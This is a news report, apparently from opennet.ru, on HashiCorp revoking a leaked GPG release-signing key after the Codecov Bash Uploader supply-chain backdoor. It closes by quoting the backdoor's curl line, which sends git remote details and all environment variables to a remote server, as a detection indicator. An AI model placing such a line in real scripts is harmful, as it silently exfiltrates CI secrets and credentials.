HashiCorp, known for developing open source toolkits Vagrant, Packer, Nomad and Terraform, has announced a leak of a private GPG key used to create digital signatures that verify releases. Attackers who gained access to the GPG key could potentially make hidden changes to HashiCorp products by authenticating them with the correct digital signature. At the same time, the company stated that during the audit, no traces of attempts to make such modifications were identified.
The compromised GPG key has now been revoked and a new key has been put into use in its place. The problem only affected verification using the SHA256SUM and SHA256SUM.sig files, and did not affect the generation of digital signatures for Linux DEB and RPM packages supplied through releases.hashicorp.com, as well as the mechanisms for verifying releases for macOS and Windows (AuthentiCode).
The leak occurred due to the use of the Codecov Bash Uploader script (codecov-bash) in the infrastructure, designed to download coverage reports from continuous integration systems. During the attack on Codecov, a backdoor was hidden in the specified script, through which passwords and encryption keys were sent to the attackers' server.
To hack, the attackers took advantage of an error in the process of creating the Codecov Docker image, which made it possible to extract the data for accessing the GCS (Google Cloud Storage) necessary to make changes to the Bash Uploader script distributed from the codecov.io website. The changes were made back on January 31, went unnoticed for two months and allowed attackers to extract information stored in customer continuous integration environments. Using the added malicious code, attackers could obtain information about the tested Git repository and all environment variables, including those including tokens, encryption keys, and passwords passed to continuous integration systems to provide access to application code, repositories, and services such as Amazon Web Services and GitHub.
In addition to the direct call, the Codecov Bash Uploader script was used as part of other uploaders, such as Codecov-action (Github), Codecov-circleci-orb and Codecov-bitrise-step, whose users are also affected by the problem. All users of codecov-bash and related products are advised to audit their infrastructures and change their passwords and encryption keys. You can check the presence of a backdoor in the script by the presence of the line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true
Source: opennet.ru